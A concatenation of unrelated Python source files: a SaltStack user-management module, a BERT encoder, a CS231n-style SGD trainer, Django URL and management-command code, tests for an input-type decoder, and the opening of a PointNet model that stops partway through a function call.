chworkphone(name, workphone, root=root)
if homephone:
chhomephone(name, homephone, root=root)
if other:
chother(name, other, root=root)
return True
def delete(name, remove=False, force=False, root=None):
"""
Remove a user from the minion
name
Username to delete
remove
Remove home directory and mail spool
force
Force some actions that would fail otherwise
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.delete name remove=True force=True
"""
cmd = ["userdel"]
if remove:
cmd.append("-r")
if force and __grains__["kernel"] != "OpenBSD" and __grains__["kernel"] != "AIX":
cmd.append("-f")
cmd.append(name)
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
ret = __salt__["cmd.run_all"](cmd, python_shell=False)
if ret["retcode"] == 0:
# Command executed with no errors
return True
if ret["retcode"] == 12:
# There's a known bug in Debian based distributions, at least, that
# makes the command exit with 12, see:
# https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1023509
if __grains__["os_family"] not in ("Debian",):
return False
if "var/mail" in ret["stderr"] or "var/spool/mail" in ret["stderr"]:
# We've hit the bug, let's log it and not fail
log.debug(
"While the userdel exited with code 12, this is a known bug on "
"debian based distributions. See http://goo.gl/HH3FzT"
)
return True
return False
def getent(refresh=False, root=None):
"""
Return the list of all info for all users
refresh
Force a refresh of user information
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.getent
"""
if "user.getent" in __context__ and not refresh:
return __context__["user.getent"]
ret = []
if root is not None and __grains__["kernel"] != "AIX":
getpwall = functools.partial(_getpwall, root=root)
else:
getpwall = functools.partial(pwd.getpwall)
for data in getpwall():
ret.append(_format_info(data))
__context__["user.getent"] = ret
return ret
def _chattrib(name, key, value, param, persist=False, root=None):
"""
Change an attribute for a named user
"""
pre_info = info(name, root=root)
if not pre_info:
raise CommandExecutionError("User '{0}' does not exist".format(name))
if value == pre_info[key]:
return True
cmd = ["usermod"]
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
if persist and __grains__["kernel"] != "OpenBSD":
cmd.append("-m")
cmd.extend((param, value, name))
__salt__["cmd.run"](cmd, python_shell=False)
return info(name, root=root).get(key) == value
def chuid(name, uid, root=None):
"""
Change the uid for a named user
name
User to modify
uid
New UID for the user account
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chuid foo 4376
"""
return _chattrib(name, "uid", uid, "-u", root=root)
def chgid(name, gid, root=None):
"""
Change the default group of the user
name
User to modify
gid
Force use GID as new primary group
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chgid foo 4376
"""
return _chattrib(name, "gid", gid, "-g", root=root)
def chshell(name, shell, root=None):
"""
Change the default shell of the user
name
User to modify
shell
New login shell for the user account
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chshell foo /bin/zsh
"""
return _chattrib(name, "shell", shell, "-s", root=root)
def chhome(name, home, persist=False, root=None):
"""
Change the home directory of the user, pass True for persist to move files
to the new home directory if the old home directory exist.
name
User to modify
home
New home directory for the user account
persist
Move contents of the home directory to the new location
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chhome foo /home/users/foo True
"""
return _chattrib(name, "home", home, "-d", persist=persist, root=root)
def chgroups(name, groups, append=False, root=None):
"""
Change the groups to which this user belongs
name
User to modify
groups
Groups to set for the user
append : False
If ``True``, append the specified group(s). Otherwise, this function
will replace the user's groups with the specified group(s).
root
Directory to chroot into
CLI Examples:
.. code-block:: bash
salt '*' user.chgroups foo wheel,root
salt '*' user.chgroups foo wheel,root append=True
"""
if isinstance(groups, six.string_types):
groups = groups.split(",")
ugrps = set(list_groups(name))
if ugrps == set(groups):
return True
cmd = ["usermod"]
if __grains__["kernel"] != "OpenBSD":
if append and __grains__["kernel"] != "AIX":
cmd.append("-a")
cmd.append("-G")
else:
if append:
cmd.append("-G")
else:
cmd.append("-S")
if append and __grains__["kernel"] == "AIX":
cmd.extend([",".join(ugrps) + "," + ",".join(groups), name])
else:
cmd.extend([",".join(groups), name])
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
result = __salt__["cmd.run_all"](cmd, python_shell=False)
# try to fallback on gpasswd to add user to localgroups
# for old lib-pamldap support
if __grains__["kernel"] != "OpenBSD" and __grains__["kernel"] != "AIX":
if result["retcode"] != 0 and "not found in" in result["stderr"]:
ret = True
for group in groups:
cmd = ["gpasswd", "-a", name, group]
if __salt__["cmd.retcode"](cmd, python_shell=False) != 0:
ret = False
return ret
return result["retcode"] == 0
def chfullname(name, fullname, root=None):
"""
Change the user's Full Name
name
User to modify
fullname
GECOS field for the full name
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chfullname foo "Foo Bar"
"""
return _update_gecos(name, "fullname", fullname, root=root)
def chroomnumber(name, roomnumber, root=None):
"""
Change the user's Room Number
CLI Example:
.. code-block:: bash
salt '*' user.chroomnumber foo 123
"""
return _update_gecos(name, "roomnumber", roomnumber, root=root)
def chworkphone(name, workphone, root=None):
"""
Change the user's Work Phone
name
User to modify
workphone
GECOS field for the work phone
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chworkphone foo 7735550123
"""
return _update_gecos(name, "workphone", workphone, root=root)
def chhomephone(name, homephone, root=None):
"""
Change the user's Home Phone
name
User to modify
homephone
GECOS field for the home phone
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chhomephone foo 7735551234
"""
return _update_gecos(name, "homephone", homephone, root=root)
def chother(name, other, root=None):
"""
Change the user's other GECOS attribute
name
User to modify
other
GECOS field for other information
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chother foobar
"""
return _update_gecos(name, "other", other, root=root)
def chloginclass(name, loginclass, root=None):
"""
Change the default login class of the user
name
User to modify
loginclass
Login class for the new account
root
Directory to chroot into
.. note::
This function only applies to OpenBSD systems.
CLI Example:
.. code-block:: bash
salt '*' user.chloginclass foo staff
"""
if __grains__["kernel"] != "OpenBSD":
return False
if loginclass == get_loginclass(name):
return True
cmd = ["usermod", "-L", loginclass, name]
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
__salt__["cmd.run"](cmd, python_shell=False)
return get_loginclass(name) == loginclass
def info(name, root=None):
"""
Return user information
name
User to get the information
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.info root
"""
# If root is provided, we use a less portable solution that
# depends on analyzing /etc/passwd manually. Of course we cannot
    # find users from NIS or LDAP, but in those cases it does not make
    # sense to provide a root parameter.
#
# Please, note that if the non-root /etc/passwd file is long the
# iteration can be slow.
if root is not None and __grains__["kernel"] != "AIX":
getpwnam = functools.partial(_getpwnam, root=root)
else:
getpwnam = functools.partial(pwd.getpwnam)
try:
data = getpwnam(_quote_username(name))
except KeyError:
return {}
else:
return _format_info(data)
def get_loginclass(name):
"""
Get the login class of the user
name
User to get the information
.. note::
This function only applies to OpenBSD systems.
CLI Example:
.. code-block:: bash
salt '*' user.get_loginclass foo
"""
if __grains__["kernel"] != "OpenBSD":
return False
userinfo = __salt__["cmd.run_stdout"](["userinfo", name], python_shell=False)
for line in userinfo.splitlines():
if line.startswith("class"):
try:
ret = line.split(None, 1)[1]
break
except (ValueError, IndexError):
continue
else:
ret = ""
return ret
def _format_info(data):
"""
Return user information in a pretty way
"""
# Put GECOS info into a list
gecos_field = salt.utils.stringutils.to_unicode(data.pw_gecos).split(",", 4)
# Make sure our list has at least five elements
while len(gecos_field) < 5:
gecos_field.append("")
return {
"gid": data.pw_gid,
"groups": list_groups(data.pw_name),
"home": data.pw_dir,
"name": data.pw_name,
"passwd": data.pw_passwd,
"shell": data.pw_shell,
"uid": data.pw_uid,
"fullname": gecos_field[0],
"roomnumber": gecos_field[1],
"workphone": gecos_field[2],
"homephone": gecos_field[3],
"other": gecos_field[4],
}
@salt.utils.decorators.path.which("id")
def primary_group(name):
"""
Return the primary group of the named user
.. versionadded:: 2016.3.0
name
User to get the information
CLI Example:
.. code-block:: bash
salt '*' user.primary_group saltadmin
"""
return __salt__["cmd.run"](["id", "-g", "-n", name])
def list_groups(name):
"""
Return a list of groups the named user belongs to
name
User to get the information
CLI Example:
.. code-block:: bash
salt '*' user.list_groups foo
"""
return salt.utils.user.get_group_list(name)
def list_users(root=None):
"""
Return a list of all users
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.list_users
"""
if root is not None and __grains__["kernel"] != "AIX":
getpwall = functools.partial(_getpwall, root=root)
else:
getpwall = functools.partial(pwd.getpwall)
return sorted([user.pw_name for user in getpwall()])
def rename(name, new_name, root=None):
"""
Change the username for a named user
name
User to modify
new_name
New value of the login name
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.rename name new_name
"""
if info(new_name, root=root):
raise CommandExecutionError("User '{0}' already exists".format(new_name))
return _chattrib(name, "name", new_name, "-l", root=root)
def _getpwnam(name, root=None):
"""
Alternative implementation of getpwnam that uses only /etc/passwd
"""
root = "/" if not root else root
passwd = os.path.join(root, "etc/passwd")
with salt.utils.files.fopen(passwd) as fp_:
for line in fp_:
line = salt.utils.stringutils.to_unicode(line)
comps = line.strip().split(":")
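# A passwd entry has seven colon-separated fields:
# name:passwd:uid:gid:gecos:home:shell. uid and gid (comps[2], comps[3])
# are cast to int so the tuple is compatible with pwd.struct_passwd.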
if comps[0] == name:
# Generate a getpwnam compatible output
comps[2], comps[3] = int(comps[2]), int(comps[3])
return pwd.struct_passwd(comps)
raise KeyError
def _getpwall(root=None):
"""
Alternative implementation of getpwall that uses only /etc/passwd
"""
root = "/" if not root else root
passwd = os.path.join(root, "etc/passwd")
with salt.utils.files.fopen(passwd) as fp_:
for line in fp_:
line = salt.utils.stringutils.to_unicode(line)
comps = line.strip().split(":")
# Generate a getpwall compatible output
comps[2], comps[3] = int(comps[2]), int(comps[3])
yield pwd.struct_passwd(comps)
|
py | 1a347b1a74ae4ba264db66db8d443d345ba67834 | import whale as wh
from tensorflow.python.layers.base import Layer
from .activations import gelu_new
from .attention import Attention
from .core import dense_dropoutput_layernorm, Dense
from .utils import get_initializer
class Block(Layer):
def __init__(self, config, **kwargs):
super(Block, self).__init__(**kwargs)
self.attention = Attention(config, name="attention")
# Use gelu_new, then match results
self.intermediate = Dense(
units=config.intermediate_size,
activation=gelu_new,
kernel_initializer=get_initializer(config.initializer_range),
name="intermediate/dense")
self.bert_output = dense_dropoutput_layernorm(config, name="output")
def call(self, inputs, training=False):
hidden_states, attention_mask = inputs
attention_output = self.attention([hidden_states, attention_mask], training=training)
intermediate_output = self.intermediate(attention_output)
layer_output = self.bert_output([intermediate_output, attention_output], training=training)
return layer_output, attention_output
class Encoder(Layer):
def __init__(self, config, **kwargs):
super(Encoder, self).__init__(**kwargs)
self.layer = [Block(config, name="layer_{}".format(i)) for i in range(config.num_hidden_layers)]
#self.layer = [Block(config, name="layer_{}".format(i)) for i in range(3)]
def _stage_call(self, layer_index, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training):
layer_output, att_output = self.layer[layer_index]([hidden_states, attention_mask], training=training)
hidden_states = layer_output
all_hidden_states = all_hidden_states + (hidden_states,)
all_att_outputs = all_att_outputs + (att_output, )
return all_hidden_states, all_att_outputs, hidden_states
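# Note: call_bak below keeps the whale (wh) pipeline-parallel variant, which
# splits the transformer blocks across stages via wh.stage(); call() runs all
# blocks in the default scope with the staging code commented out.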
def call_bak(self, inputs, training=False):
hidden_states, attention_mask = inputs
all_hidden_states = ()
all_att_outputs = ()
bert_large_layers_count = 12
assert len(self.layer) == bert_large_layers_count
# Use default scope.
for i in range(0, 2):
all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
# with wh.stage():
# for i in range(each_stage_layers_count, 2*each_stage_layers_count):
# all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
with wh.stage():
for i in range(2, 12):
all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
wh.current_scope_as_default()
final_outputs = []
for hidden_states in all_hidden_states:
final_outputs.append(hidden_states)
return final_outputs, all_att_outputs
def call(self, inputs, training=False):
hidden_states, attention_mask = inputs
all_hidden_states = ()
all_att_outputs = ()
bert_large_layers_count = 12
assert len(self.layer) == bert_large_layers_count
# Use default scope.
for i in range(0, bert_large_layers_count):
all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
# with wh.stage():
# for i in range(each_stage_layers_count, 2*each_stage_layers_count):
# all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
"""
with wh.stage():
for i in range(2, 12):
all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
wh.current_scope_as_default()
"""
final_outputs = []
for hidden_states in all_hidden_states:
final_outputs.append(hidden_states)
return final_outputs, all_att_outputs
|
py | 1a347b7a4d813bda20e345004372629dd1b1bbec | import numpy as np
class ClassifierTrainer(object):
""" The trainer class performs SGD with momentum on a cost function """
def __init__(self):
self.step_cache = {} # for storing velocities in momentum update
def train(self, X, y, X_val, y_val,
model, loss_function,
reg=0.0,
learning_rate=1e-2, momentum=0, learning_rate_decay=0.95,
update='momentum', sample_batches=True,
num_epochs=30, batch_size=100, acc_frequency=None,
verbose=False):
"""
Optimize the parameters of a model to minimize a loss function. We use
training data X and y to compute the loss and gradients, and periodically
check the accuracy on the validation set.
Inputs:
- X: Array of training data; each X[i] is a training sample.
- y: Vector of training labels; y[i] gives the label for X[i].
- X_val: Array of validation data
- y_val: Vector of validation labels
- model: Dictionary that maps parameter names to parameter values. Each
parameter value is a numpy array.
- loss_function: A function that can be called in the following ways:
scores = loss_function(X, model, reg=reg)
loss, grads = loss_function(X, model, y, reg=reg)
- reg: Regularization strength. This will be passed to the loss function.
- learning_rate: Initial learning rate to use.
- momentum: Parameter to use for momentum updates.
- learning_rate_decay: The learning rate is multiplied by this after each
epoch.
- update: The update rule to use. One of 'sgd', 'momentum', or 'rmsprop'.
- sample_batches: If True, use a minibatch of data for each parameter update
(stochastic gradient descent); if False, use the entire training set for
each parameter update (gradient descent).
- num_epochs: The number of epochs to take over the training data.
- batch_size: The number of training samples to use at each iteration.
- acc_frequency: If set to an integer, we compute the training and
validation set error after every acc_frequency iterations.
- verbose: If True, print status after each epoch.
Returns a tuple of:
- best_model: The model that got the highest validation accuracy during
training.
- loss_history: List containing the value of the loss function at each
iteration.
- train_acc_history: List storing the training set accuracy at each epoch.
- val_acc_history: List storing the validation set accuracy at each epoch.
"""
N = X.shape[0]
if sample_batches:
iterations_per_epoch = N / batch_size # using SGD
else:
iterations_per_epoch = 1 # using GD
num_iters = num_epochs * iterations_per_epoch
epoch = 0
best_val_acc = 0.0
best_model = {}
loss_history = []
train_acc_history = []
val_acc_history = []
for it in xrange(num_iters):
if it % 500 == 0: print 'starting iteration ', it
# get batch of data
if sample_batches:
batch_mask = np.random.choice(N, batch_size)
X_batch = X[batch_mask]
y_batch = y[batch_mask]
else:
# no SGD used, full gradient descent
X_batch = X
y_batch = y
# evaluate cost and gradient
cost, grads = loss_function(X_batch, model, y_batch, reg)
loss_history.append(cost)
# perform a parameter update
for p in model:
# compute the parameter step
if update == 'sgd':
dx = -learning_rate * grads[p]
elif update == 'momentum':
if not p in self.step_cache:
self.step_cache[p] = np.zeros(grads[p].shape)
# dx = np.zeros_like(grads[p]) # you can remove this after
#####################################################################
# TODO: implement the momentum update formula and store the step #
# update into variable dx. You should use the variable #
# step_cache[p] and the momentum strength is stored in momentum. #
# Don't forget to also update the step_cache[p]. #
#####################################################################
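# The classic momentum rule implemented just below:
#   v <- momentum * v - learning_rate * grad;  x <- x + v
# (self.step_cache[p] stores the velocity v; dx is the step applied later
# via model[p] += dx).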
self.step_cache[p] = momentum * self.step_cache[p] - learning_rate * grads[p]
dx = self.step_cache[p]
elif update == 'rmsprop':
decay_rate = 0.99 # you could also make this an option
if not p in self.step_cache:
self.step_cache[p] = np.zeros(grads[p].shape)
#####################################################################
# TODO: implement the RMSProp update and store the parameter update #
# dx. Don't forget to also update step_cache[p]. Use smoothing 1e-8 #
#####################################################################
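# The RMSProp rule implemented just below:
#   cache <- decay_rate * cache + (1 - decay_rate) * grad**2
#   x <- x - learning_rate * grad / sqrt(cache + 1e-8)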
self.step_cache[p] = decay_rate * self.step_cache[p] + ( 1 - decay_rate ) * ( grads[p] ** 2 )
dx = - learning_rate * grads[p] / np.sqrt( self.step_cache[p] + 1e-8)
else:
raise ValueError('Unrecognized update type "%s"' % update)
# update the parameters
model[p] += dx
# every epoch perform an evaluation on the validation set
first_it = (it == 0)
epoch_end = (it + 1) % iterations_per_epoch == 0
acc_check = (acc_frequency is not None and it % acc_frequency == 0)
if first_it or epoch_end or acc_check:
if it > 0 and epoch_end:
# decay the learning rate
learning_rate *= learning_rate_decay
epoch += 1
# evaluate train accuracy
if N > 1000:
train_mask = np.random.choice(N, 1000)
X_train_subset = X[train_mask]
y_train_subset = y[train_mask]
else:
X_train_subset = X
y_train_subset = y
scores_train = loss_function(X_train_subset, model)
y_pred_train = np.argmax(scores_train, axis=1)
train_acc = np.mean(y_pred_train == y_train_subset)
train_acc_history.append(train_acc)
# evaluate val accuracy
scores_val = loss_function(X_val, model)
y_pred_val = np.argmax(scores_val, axis=1)
val_acc = np.mean(y_pred_val == y_val)
val_acc_history.append(val_acc)
# keep track of the best model based on validation accuracy
if val_acc > best_val_acc:
# make a copy of the model
best_val_acc = val_acc
best_model = {}
for p in model:
best_model[p] = model[p].copy()
# print progress if needed
if verbose:
print ('Finished epoch %d / %d: cost %f, train: %f, val %f, lr %e'
% (epoch, num_epochs, cost, train_acc, val_acc, learning_rate))
if verbose:
print 'finished optimization. best validation accuracy: %f' % (best_val_acc, )
# return the best model and the training history statistics
return best_model, loss_history, train_acc_history, val_acc_history
|
py | 1a347c1cbd1cb2af6def6f2cee6c1b5847c3d86e | from django.conf.urls import url
from .views import (
semseterResultxlsx,
)
urlpatterns=[
url(r'^semester-xlsx/(?P<collegeCode>\d+)/(?P<branchCode>\d+)/(?P<yearOfJoining>\d+)/(?P<semester>\d+)/$',semseterResultxlsx,name='semseterResultxlsx')
]
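# Example (hypothetical values): /semester-xlsx/115/31/2019/5/ resolves to
# semseterResultxlsx with collegeCode=115, branchCode=31, yearOfJoining=2019,
# semester=5.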
|
py | 1a347c3f195b406cd6fa9aad3c50d431c9f71ec4 | import bisect
from functools import total_ordering
from django.core.management import BaseCommand
from classification.enums import SpecialEKeys
from classification.models import Classification
@total_ordering
class ConversionSize:
def __init__(self, vc: Classification):
self.ref_length = vc.update_cached_c_hgvs()
self.vc_id = vc.id
self.chgvs = vc.get(SpecialEKeys.C_HGVS)
vc.save()
def __lt__(self, other):
return self.ref_length < other.ref_length
class Command(BaseCommand):
def handle(self, *args, **options):
conversions = list()
update_count = 0
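# Walk every Classification, refresh its cached c.hgvs, and keep a running
# top-10 of the largest reference lengths: bisect.insort keeps `conversions`
# sorted ascending, so pop(0) always discards the current smallest entry.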
for vc in Classification.objects.all():
conversion = ConversionSize(vc)
bisect.insort(conversions, conversion)
if len(conversions) > 10:
conversions.pop(0)
update_count += 1
if update_count % 100 == 0:
print(f"Completed {update_count}")
print(f"Bulk Update of Cached c.hgvs - completed")
print(f"Biggest ref lengths are:")
for conversion in conversions[::-1]:
print(f"{conversion.ref_length} from vc.id {conversion.vc_id} {conversion.chgvs}")
|
py | 1a347c472675485c21379af22928a5a05067bccb | # Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: BSD-2
import functools
import json
import textwrap
import unittest
from typing import List
from typing import Tuple
import ddt
import mock
from tau_clients import decoders
from tau_clients import exceptions
TEST_SHA1_1 = "a" * 40
TEST_SHA1_2 = "b" * 40
TEST_UUID_1 = "2f945319183a004000f0486eb8aab782"
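# The 40-character hex strings stand in for SHA1 file hashes, while the
# 32-character hex string stands in for an analysis task UUID.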
@ddt.ddt
class DecoderTestCase(unittest.TestCase):
"""Test the decoder."""
@staticmethod
def _side_effect_walk(
path: str,
existing_path: str,
existing_files: List[str],
) -> List[Tuple[str, None, List[str]]]:
"""
Side-effect returning a list of existing file if the path matches the existing path.
:param str path: the path
:param str existing_path: the path flagged as existing
:param list[str] existing_files: the existing files to be returned
:rtype: tuple(str, None, list[str])
:return: the mocked walk
"""
if path in existing_path:
return [(path, None, existing_files)]
else:
return []
@staticmethod
def _side_effect_exists(path: str, existing_paths: List[str]) -> bool:
"""
Side-effect returning whether something exists.
:param str path: the path
:param str existing_paths: the list of existing paths
:rtype: bool
:return: the mocked exist
"""
if path in existing_paths:
return True
else:
return False
@ddt.data(
([TEST_SHA1_1, TEST_SHA1_2], decoders.InputType.FILE_HASH),
([TEST_UUID_1], decoders.InputType.TASK_UUID),
)
def test_decode_input(self, args):
"""Test the decoder when parsing command line."""
arguments, expected_type = args
decoder = decoders.InputTypeDecoder()
input_bits, input_type = decoder.decode(
input_type=None,
arguments=arguments,
inspect_content=False,
)
self.assertEqual(input_type, expected_type)
self.assertEqual(input_bits, arguments)
# try again with no hint, we should get the same results
input_bits, input_type = decoder.decode(
input_type=expected_type,
arguments=arguments,
inspect_content=False,
)
self.assertEqual(input_type, expected_type)
self.assertEqual(input_bits, arguments)
@ddt.data(
([TEST_SHA1_1, TEST_SHA1_2], decoders.InputType.FILE_HASH),
([TEST_UUID_1], decoders.InputType.TASK_UUID),
)
def test_decode_input__inspect(self, args):
"""Test the decoder when parsing command line and we say to inspect files (weird)."""
arguments, expected_type = args
decoder = decoders.InputTypeDecoder()
input_bits, input_type = decoder.decode(
input_type=None,
arguments=arguments,
inspect_content=True,
)
self.assertEqual(input_type, expected_type)
self.assertEqual(input_bits, arguments)
# try again with no hint, we should get the same results
input_bits, input_type = decoder.decode(
input_type=expected_type,
arguments=arguments,
inspect_content=True,
)
self.assertEqual(input_type, expected_type)
self.assertEqual(input_bits, arguments)
def test_decode_input__multiple(self):
"""Test the decoder when parsing files but the arguments have different types."""
decoder = decoders.InputTypeDecoder()
with mock.patch("os.path.isfile") as mock_file:
mock_file.side_effect = functools.partial(
self._side_effect_exists,
existing_paths=["path/to/open"],
)
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not choose"):
_, _ = decoder.decode(
input_type=None,
arguments=["path/to/open", TEST_SHA1_1],
inspect_content=False,
)
# try again with no hint and we should see no difference
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not choose"):
_, _ = decoder.decode(
input_type=decoders.InputType.FILE_HASH,
arguments=["path/to/open", TEST_SHA1_1],
inspect_content=False,
)
@ddt.data(
# JSON
(json.dumps([TEST_SHA1_1]), [TEST_SHA1_1]),
(json.dumps([{"sha1": TEST_SHA1_1}]), [TEST_SHA1_1]),
(json.dumps([{"file_sha1": TEST_SHA1_1}]), [TEST_SHA1_1]),
(json.dumps([{"file_md5": TEST_SHA1_2, "file_sha1": TEST_SHA1_1}]), [TEST_SHA1_1]),
(json.dumps([{"file_md5": TEST_SHA1_1}]), [TEST_SHA1_1]),
# CSV
(
textwrap.dedent(
f"""
label1,file_sha1
data,{TEST_SHA1_1}
"""
).strip(),
[TEST_SHA1_1],
),
# PLAIN TEXT
(
textwrap.dedent(
f"""
{TEST_SHA1_1}
{TEST_SHA1_2}
"""
).strip(),
[TEST_SHA1_1, TEST_SHA1_2],
),
)
def test_decode_input__file(self, args):
"""Test the decoder when parsing files."""
test_data, expected_result = args
decoder = decoders.InputTypeDecoder()
with mock.patch("builtins.open", mock.mock_open(read_data=test_data)) as mock_file:
input_bits, input_type = decoder.decode(
input_type=decoders.InputType.FILE,
arguments=["path/to/open"],
inspect_content=True,
)
mock_file.assert_called_with("path/to/open", "r")
self.assertEqual(input_type, decoders.InputType.FILE_HASH)
self.assertEqual(input_bits, expected_result)
# try again with no hint and the only difference is that we test a file for existence
with mock.patch("os.path.isfile") as mock_file_2:
def side_effect(filename):
if filename == "path/to/open":
return True
else:
return False
mock_file_2.side_effect = side_effect
input_bits, input_type = decoder.decode(
input_type=None,
arguments=["path/to/open"],
inspect_content=True,
)
mock_file.assert_called_with("path/to/open", "r")
self.assertEqual(input_type, decoders.InputType.FILE_HASH)
self.assertEqual(input_bits, expected_result)
def test_decode_input__file__no_inspect(self):
"""Test the decoder when parsing files but we give up inspecting."""
decoder = decoders.InputTypeDecoder()
with mock.patch("os.path.isfile") as mock_file:
mock_file.side_effect = functools.partial(
self._side_effect_exists,
existing_paths=["path/to/open"],
)
input_bits, input_type = decoder.decode(
input_type=decoders.InputType.FILE,
arguments=["path/to/open"],
inspect_content=False,
)
self.assertEqual(input_type, decoders.InputType.FILE)
self.assertEqual(input_bits, ["path/to/open"])
# try again with no hint and we should see no difference
input_bits, input_type = decoder.decode(
input_type=None,
arguments=["path/to/open"],
inspect_content=False,
)
self.assertEqual(input_type, decoders.InputType.FILE)
self.assertEqual(input_bits, ["path/to/open"])
def test_decode_input__directory(self):
"""Test the decoder when parsing a directory."""
decoder = decoders.InputTypeDecoder()
with mock.patch("os.path.isdir") as mock_dir:
with mock.patch("os.walk") as mock_walk:
with mock.patch("os.path.isfile") as mock_file:
mock_dir.side_effect = functools.partial(
self._side_effect_exists, existing_paths=["path/to/list"]
)
mock_walk.side_effect = functools.partial(
self._side_effect_walk,
existing_path="path/to/list",
existing_files=["a", "b"],
)
mock_file.side_effect = functools.partial(
self._side_effect_exists,
existing_paths=["path/to/list/a", "path/to/list/b"],
)
input_bits, input_type = decoder.decode(
input_type=decoders.InputType.DIRECTORY,
arguments=["path/to/list"],
inspect_content=False,
)
self.assertEqual(input_type, decoders.InputType.FILE)
self.assertEqual(input_bits, ["path/to/list/a", "path/to/list/b"])
# try again with no hint but we should see no difference
input_bits, input_type = decoder.decode(
input_type=None,
arguments=["path/to/list"],
inspect_content=False,
)
self.assertEqual(input_type, decoders.InputType.FILE)
self.assertEqual(input_bits, ["path/to/list/a", "path/to/list/b"])
def test_decode_input__directory__empty(self):
"""Test the decoder when parsing an empty directory."""
decoder = decoders.InputTypeDecoder()
with mock.patch("os.path.isdir") as mock_dir:
with mock.patch("os.walk") as mock_walk:
mock_dir.side_effect = functools.partial(
self._side_effect_exists, existing_paths=["path/to/list"]
)
mock_walk.side_effect = functools.partial(
self._side_effect_walk,
existing_path="path/to/list",
existing_files=[],
)
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not infer"):
_, _ = decoder.decode(
input_type=decoders.InputType.DIRECTORY,
arguments=["path/to/list"],
inspect_content=False,
)
# try again with no hint but we should see no difference
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not infer"):
_, _ = decoder.decode(
input_type=None,
arguments=["path/to/list"],
inspect_content=False,
)
@ddt.data(
# JSON
(json.dumps([]), []),
(json.dumps([{"file_md4": TEST_SHA1_1}]), []),
# CSV
(
textwrap.dedent(
"""
label1,file_sha1
"""
).strip(),
[],
),
(
textwrap.dedent(
"""
label1,file_md5
"""
).strip(),
[],
),
# PLAIN TEXT
(
textwrap.dedent(
"""
test1
test2
"""
).strip(),
[],
),
)
def test_decode_input__file__empty(self, args):
"""Test the decoder when parsing empty files."""
test_data, expected_result = args
decoder = decoders.InputTypeDecoder()
with mock.patch("builtins.open", mock.mock_open(read_data=test_data)) as _:
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not decode"):
_, _ = decoder.decode(
input_type=decoders.InputType.FILE,
arguments=["path/to/open"],
inspect_content=True,
)
# try again with no hint but we should see no difference
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not infer"):
_, _ = decoder.decode(
input_type=None,
arguments=["path/to/open"],
inspect_content=True,
)
def test_decode_input__file__no_inspect__empty(self):
"""Test the decoder when parsing empty files and give up inspecting."""
decoder = decoders.InputTypeDecoder()
with mock.patch("os.path.isfile") as mock_file:
mock_file.side_effect = functools.partial(
self._side_effect_exists,
existing_paths=[],
)
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not infer"):
_, _ = decoder.decode(
input_type=decoders.InputType.FILE,
arguments=["path/to/open"],
inspect_content=False,
)
# try again with no hint but we should see no difference
with self.assertRaisesRegexp(exceptions.InputTypeException, "Could not infer"):
_, _ = decoder.decode(
input_type=None,
arguments=["path/to/open"],
inspect_content=False,
)
|
py | 1a347e1de60a669faaf9a22c110867c191317edf | import tensorflow as tf
import numpy as np
import math
import sys
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(BASE_DIR, '../utils'))
import tensorflow as tf
import tf_util
from transform_nets import input_transform_net, feature_transform_net
import pyramid_nets
def placeholder_inputs(batch_size, num_point):
pointclouds_pl = tf.placeholder(tf.float32,
shape=(batch_size, num_point, 3))
labels_pl = tf.placeholder(tf.int32,
shape=(batch_size, num_point))
return pointclouds_pl, labels_pl
def placeholder_inputs_weight(batch_size, num_point):
pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, 3))
labels_pl = tf.placeholder(tf.int32, shape=(batch_size, num_point))
smpws_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point))
return pointclouds_pl, labels_pl, smpws_pl
def get_model(point_cloud, is_training, num_classes, bn_decay=None):
""" Classification PointNet, input is BxNx3, output BxNx50 """
batch_size = point_cloud.get_shape()[0].value
num_point = point_cloud.get_shape()[1].value
end_points = {}
with tf.variable_scope('transform_net1') as sc:
transform = input_transform_net(point_cloud, is_training, bn_decay, K=3)
point_cloud_transformed = tf.matmul(point_cloud, transform)
input_image = tf.expand_dims(point_cloud_transformed, -1)
net = tf_util.conv2d(input_image, 64, [1,3],
padding='VALID', stride=[1,1],
bn=True, is_training=is_training,
